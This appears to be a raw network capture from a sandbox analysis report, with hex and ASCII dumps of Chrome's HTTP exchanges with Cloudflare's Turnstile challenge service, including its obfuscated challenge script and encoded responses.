                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3738&min_rtt=3292&rtt_var=1553&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2248&delivery_rate=865127&cwnd=251&unsent_bytes=0&cid=6a4841361699a886&ts=415&x=0"
                                                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                                                          Age: 6675
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f38966e0c4a4398-EWR
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2472&min_rtt=2466&rtt_var=937&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1899&delivery_rate=1159650&cwnd=230&unsent_bytes=0&cid=0e7cb3f65a06fb5f&ts=9335&x=0"
                                                                                                                                                                                                                          2024-12-17 17:21:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          17192.168.2.1849800104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:06 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:07 GMT
                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f3896740ce7439a-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          18192.168.2.1849801104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f38965da8164322&lang=auto HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:07 GMT
                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                          Content-Length: 114888
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f38967689654370-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f
                                                                                                                                                                                                                          Data Ascii: ror","turnstile_success":"Success%21","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 36 30 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 38 32 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 35 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 39 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32 32 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 39 36 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 34 32 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28
                                                                                                                                                                                                                          Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1160))/1*(parseInt(gI(1182))/2)+parseInt(gI(1135))/3+-parseInt(gI(1249))/4+-parseInt(gI(1322))/5*(-parseInt(gI(696))/6)+-parseInt(gI(942))/7+parseInt(
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 72 65 74 75 72 6e 20 48 5e 47 7d 2c 27 58 76 4f 7a 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 5e 48 7d 2c 27 66 63 6a 73 57 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2d 48 7d 2c 27 51 4f 51 6b 74 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 21 3d 3d 48 7d 2c 27 79 6c 73 77 63 27 3a 68 78 28 35 32 31 29 2c 27 6c 54 49 4b 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 4c 48 6e 41 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 4a 43 71 6e 65 27 3a 68 78 28 33 36 33 29 7d 2c 6e 75 6c 6c 3d 3d 3d 68 7c 7c 68 3d 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20
                                                                                                                                                                                                                          Data Ascii: return H^G},'XvOzn':function(G,H){return G^H},'fcjsW':function(G,H){return G-H},'QOQkt':function(G,H){return G!==H},'ylswc':hx(521),'lTIKm':function(G,H,I,J){return G(H,I,J)},'LHnAk':function(G,H){return G(H)},'JCqne':hx(363)},null===h||h===void 0)return
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 3d 68 78 2c 4f 62 6a 65 63 74 5b 68 79 28 31 35 30 35 29 5d 5b 68 79 28 31 35 35 35 29 5d 5b 68 79 28 38 35 30 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 68 79 28 31 31 35 30 29 5d 28 47 29 7d 7d 2c 66 70 3d 67 4a 28 31 33 32 38 29 5b 67 4a 28 33 33 39 29 5d 28 27 3b 27 29 2c 66 71 3d 66 70 5b 67 4a 28 32 38 39 29 5d 5b 67 4a 28 31 31 36 38 29 5d 28 66 70 29 2c 65 4d 5b 67 4a 28 31 35 34 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 68 41 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 68 41 3d 67 4a 2c 69 3d 7b 27 78 41 66 6a 46 27 3a 68 41 28 39 38 36 29 2c 27 63 75 75 68 54 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 72 59 77 67 68 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29
                                                                                                                                                                                                                          Data Ascii: =hx,Object[hy(1505)][hy(1555)][hy(850)](j,H)||(j[H]=[]),j[H][hy(1150)](G)}},fp=gJ(1328)[gJ(339)](';'),fq=fp[gJ(289)][gJ(1168)](fp),eM[gJ(1549)]=function(g,h,hA,i,j,k,l,m){for(hA=gJ,i={'xAfjF':hA(986),'cuuhT':function(n,o){return n<o},'rYwgh':function(n,o)
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 34 28 31 33 32 37 29 5d 28 73 65 74 54 69 6d 65 6f 75 74 2c 66 42 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 42 2c 30 29 2c 66 43 3d 66 75 6e 63 74 69 6f 6e 28 69 35 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 35 3d 67 4a 2c 64 3d 7b 27 7a 44 57 4c 66 27 3a 69 35 28 35 39 31 29 2c 27 4f 6f 4f 6f 68 27 3a 69 35 28 39 30 34 29 2c 27 66 42 77 76 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 5e 69 7d 2c 27 69 77 75 51 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6f 65 73 71 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 79 5a 6c 45 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 3e 69 7d 2c 27
                                                                                                                                                                                                                          Data Ascii: 4(1327)](setTimeout,fB,0)}):setTimeout(fB,0),fC=function(i5,d,e,f,g){return i5=gJ,d={'zDWLf':i5(591),'OoOoh':i5(904),'fBwvD':function(h,i){return h^i},'iwuQu':function(h,i){return h-i},'oesqe':function(h,i){return h+i},'yZlEA':function(h,i){return h>>i},'
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 45 77 6b 6a 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 69 35 28 31 34 36 37 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 36 29 7b 72 65 74 75 72 6e 20 69 36 3d 62 2c 64 5b 69 36 28 39 37 34 29 5d 5b 69 36 28 32 33 37 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 63 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 50 2c 4c 2c 4d 2c 51 2c 4e 2c 52 2c 53 29 7b 69 66 28 69 63 3d 69 35 2c 73 3d 7b 27 6e 41 75 61 67 27 3a 66 75 6e
                                                                                                                                                                                                                          Data Ascii: n(h,i){return h<i},'Ewkjk':function(h,i){return h+i}},e=String[i5(1467)],f={'h':function(h){return h==null?'':f.g(h,6,function(i,i6){return i6=b,d[i6(974)][i6(237)](i)})},'g':function(i,j,o,ic,s,x,B,C,D,E,F,G,H,I,J,K,P,L,M,Q,N,R,S){if(ic=i5,s={'nAuag':fun
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 5d 28 66 75 6e 63 74 69 6f 6e 28 61 36 2c 69 64 29 7b 72 65 74 75 72 6e 20 69 64 3d 69 63 2c 73 5b 69 64 28 37 35 30 29 5d 28 27 6f 2e 27 2c 61 36 29 7d 29 7d 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 69 63 28 31 35 30 35 29 5d 5b 69 63 28 31 35 35 35 29 5d 5b 69 63 28 38 35 30 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 69 63 28 35 34 39 29 5d 28 64 5b 69 63 28 36 30 36 29 5d 2c 64 5b 69 63 28 31 34 30 39 29 5d 29 29 7b 66 6f 72 28 52 3d 27 27 2c 53 3d 30 3b 53 3c 73 5b 69 63 28 39 34 39 29 5d 28 34 2c 48 5b 69 63 28 37 35 37 29 5d 29 3b 52 2b 3d 69 63 28 31 32 36 34 29 5b 69 63 28 32 33 37 29 5d 28 6a 5b 73 5b 69 63 28 33 36 37 29 5d 28 53 2c 32 29 5d 3e 3e 73 5b 69 63 28 39 34 39 29 5d 28 38 2c 73 5b 69 63 28 31 36 35 29 5d 28 33 2c 53 25 34 29 29 2b
                                                                                                                                                                                                                          Data Ascii: ](function(a6,id){return id=ic,s[id(750)]('o.',a6)})}else{if(Object[ic(1505)][ic(1555)][ic(850)](C,D)){if(d[ic(549)](d[ic(606)],d[ic(1409)])){for(R='',S=0;S<s[ic(949)](4,H[ic(757)]);R+=ic(1264)[ic(237)](j[s[ic(367)](S,2)]>>s[ic(949)](8,s[ic(165)](3,S%4))+
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 63 28 31 31 38 37 29 5d 28 49 3c 3c 31 2c 4e 29 2c 64 5b 69 63 28 39 35 39 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 63 28 31 31 35 30 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 63 28 31 33 34 32 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 64 5b 69 63 28 33 37 34 29 5d 28 49 2c 31 29 7c 64 5b 69 63 28 31 32 36 30 29 5d 28 4e 2c 31 29 2c 64 5b 69 63 28 39 35 39 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 63 28 31 31 35 30 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 69 63 28 39 35 39 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 69
                                                                                                                                                                                                                          Data Ascii: {for(N=1,x=0;x<G;I=d[ic(1187)](I<<1,N),d[ic(959)](J,j-1)?(J=0,H[ic(1150)](o(I)),I=0):J++,N=0,x++);for(N=D[ic(1342)](0),x=0;16>x;I=d[ic(374)](I,1)|d[ic(1260)](N,1),d[ic(959)](J,j-1)?(J=0,H[ic(1150)](o(I)),I=0):J++,N>>=1,x++);}E--,d[ic(959)](0,E)&&(E=Math[i
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 68 28 36 39 39 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 64 5b 69 68 28 31 32 36 30 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 68 28 34 39 37 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 68 28 36 39 39 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 48 26
                                                                                                                                                                                                                          Data Ascii: H==0&&(H=j,G=o(I++));continue;case'4':F<<=1;continue}break}switch(J){case 0:for(J=0,K=Math[ih(699)](2,8),F=1;K!=F;N=d[ih(1260)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=d[ih(497)](0<N?1:0,F),F<<=1);O=e(J);break;case 1:for(J=0,K=Math[ih(699)](2,16),F=1;K!=F;N=H&


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          19192.168.2.1849802104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1169OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Content-Length: 3225
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          CF-Challenge: UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC3225OUTData Raw: 76 5f 38 66 33 38 39 36 35 64 61 38 31 36 34 33 32 32 3d 25 32 62 44 6c 47 55 47 24 47 4f 47 51 47 66 47 6a 4d 69 4c 4d 69 43 32 48 43 48 38 2d 4b 48 2d 69 48 32 57 38 41 48 4f 57 69 53 4d 69 57 41 63 69 75 62 47 41 6e 74 43 62 6e 55 58 44 48 6b 69 6d 32 24 41 69 56 24 47 69 71 39 69 2d 64 67 69 4b 52 32 69 38 6c 58 47 53 62 69 67 47 24 55 52 69 66 4d 6e 24 57 69 50 47 34 24 2d 4d 63 46 32 69 41 69 64 67 63 48 37 64 73 2d 61 39 78 49 6a 56 7a 62 48 50 2b 31 72 41 35 75 24 62 46 49 63 69 36 69 74 41 69 24 6e 6c 69 2b 67 5a 58 62 4d 62 69 71 36 67 75 2b 47 74 77 48 48 55 6a 6a 56 2d 4d 71 6c 44 6e 6d 53 63 69 6c 32 64 2b 39 69 48 4d 34 48 2b 35 51 78 54 64 48 24 6c 43 34 69 69 39 73 4d 67 24 2d 69 69 65 71 75 49 39 69 74 55 61 51 6e 69 4d 43 68 24 71 4c 63
                                                                                                                                                                                                                          Data Ascii: v_8f38965da8164322=%2bDlGUG$GOGQGfGjMiLMiC2HCH8-KH-iH2W8AHOWiSMiWAciubGAntCbnUXDHkim2$AiV$Giq9i-dgiKR2i8lXGSbigG$URifMn$WiPG4$-McF2iAidgcH7ds-a9xIjVzbHP+1rA5u$bFIci6itAi$nli+gZXbMbiq6gu+GtwHHUjjV-MqlDnmScil2d+9iHM4H+5QxTdH$lC4ii9sMg$-iiequI9itUaQniMCh$qLc
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:07 GMT
                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                          Content-Length: 149440
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-chl-gen: 7b09DbE7wyNVkbU/YuFrxOgr6Xrplle4ALV1eCRki0uOeTyvq2tWaEXIiKffMYoT8WnOQhV4aMNszyU1EZ/yvSaHWFXPhg7mo1I49xcDn3zxwt/HPBLzv4AL2SKVBTzdDQOVQbjT/S1Elcjfkrwalu/wyXfZnsfHmQ7WKBPYyWtC0s1f+T5qmYO5Tsb3x81ZgZeuPRKfK0sos4YBTr80z+P8+0pMaSGM753+Vw8wscwzY0IUumHtV2yBpjfcvQEkV1hUVZsJ24ohPmbw4veEDp5bGbiw0vy5RslrUDraVO2onTqPoFu1YT8mISPtiDYjdc5u4jfoHLsjuSXrN0L0LAKAt0u33NPGYmbr4Huf4aShXMHE88qD14X1M8ZklJES4H92BzCJsze+uFR65kDAS11AuonqzWOwQ5qzquSXSnDHGdFEapxmLNzsM1M8LRh8MZ8tY7yNNFUHQBP2XMj4Mtm6Sggpw6cLMFIfi3ZPUDSLZ1Y=$ck9DdIHxQ9S2oZvS
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f389676bfa44394-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC622INData Raw: 54 32 35 6c 64 49 71 62 5a 49 68 74 6e 5a 46 78 59 58 42 36 65 6e 53 6c 6d 6e 4e 31 63 34 43 57 72 6f 56 77 6a 4b 4f 67 67 49 64 73 70 47 2b 6f 6d 71 57 74 75 5a 70 36 75 62 71 41 77 59 79 6d 70 4d 47 35 78 4b 61 47 79 63 43 61 71 4d 36 68 30 71 6e 54 73 4d 62 46 71 4b 53 6a 79 70 6a 4d 33 72 58 58 76 4e 48 54 72 4e 47 75 35 75 61 30 75 62 54 65 32 37 6e 5a 34 65 6a 4f 72 75 58 32 77 66 58 78 2b 73 58 35 36 73 6d 39 2f 64 54 76 30 64 66 31 2b 2b 4c 43 41 72 76 46 43 2f 33 44 37 65 4d 43 42 2b 37 4f 45 2b 7a 65 46 75 67 48 34 68 72 30 38 76 76 59 32 50 66 39 34 50 6b 6d 38 50 30 4a 34 67 55 63 35 66 67 46 35 69 6b 43 37 67 45 4c 42 77 45 32 45 51 55 47 4b 77 6b 4b 39 41 67 76 45 78 49 44 4e 6a 6f 63 4f 6b 4e 46 4f 55 31 49 48 43 4d 63 53 44 77 77 46 43 59
                                                                                                                                                                                                                          Data Ascii: T25ldIqbZIhtnZFxYXB6enSlmnN1c4CWroVwjKOggIdspG+omqWtuZp6ubqAwYympMG5xKaGycCaqM6h0qnTsMbFqKSjypjM3rXXvNHTrNGu5ua0ubTe27nZ4ejOruX2wfXx+sX56sm9/dTv0df1++LCArvFC/3D7eMCB+7OE+zeFugH4hr08vvY2Pf94Pkm8P0J4gUc5fgF5ikC7gELBwE2EQUGKwkK9AgvExIDNjocOkNFOU1IHCMcSDwwFCY
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 73 39 62 45 52 6b 4b 45 6f 77 59 79 6c 51 4d 47 68 4f 51 6b 4a 47 5a 7a 70 37 55 6c 4e 4c 62 6b 35 74 68 46 74 57 64 6c 4e 46 57 55 4a 39 53 45 6c 6f 5a 30 64 62 5a 57 31 4f 55 57 42 58 64 31 4f 51 63 46 5a 30 6d 6e 4f 4f 63 46 57 64 6b 61 4a 5a 63 6f 42 34 67 70 32 71 6c 6d 57 4e 63 61 32 4c 63 48 53 31 68 36 47 42 6c 58 57 64 72 33 79 63 75 48 69 2b 6b 71 4b 50 72 37 4f 2b 77 4c 61 34 76 4b 79 35 78 71 32 6c 79 36 65 74 6a 37 62 47 77 64 57 74 32 38 61 58 75 4c 62 52 32 74 4b 5a 35 4c 75 2f 77 74 6a 6e 70 64 57 30 37 4c 33 6f 7a 63 61 75 78 73 58 77 72 4e 2b 76 73 4e 44 6a 73 37 54 51 35 37 65 34 34 4f 75 37 76 4f 44 76 76 38 44 32 38 38 50 45 39 76 66 48 79 41 66 37 79 38 77 48 41 4d 2f 52 46 77 54 54 31 52 63 49 31 39 6e 62 44 4e 76 64 4a 69 59 67 39
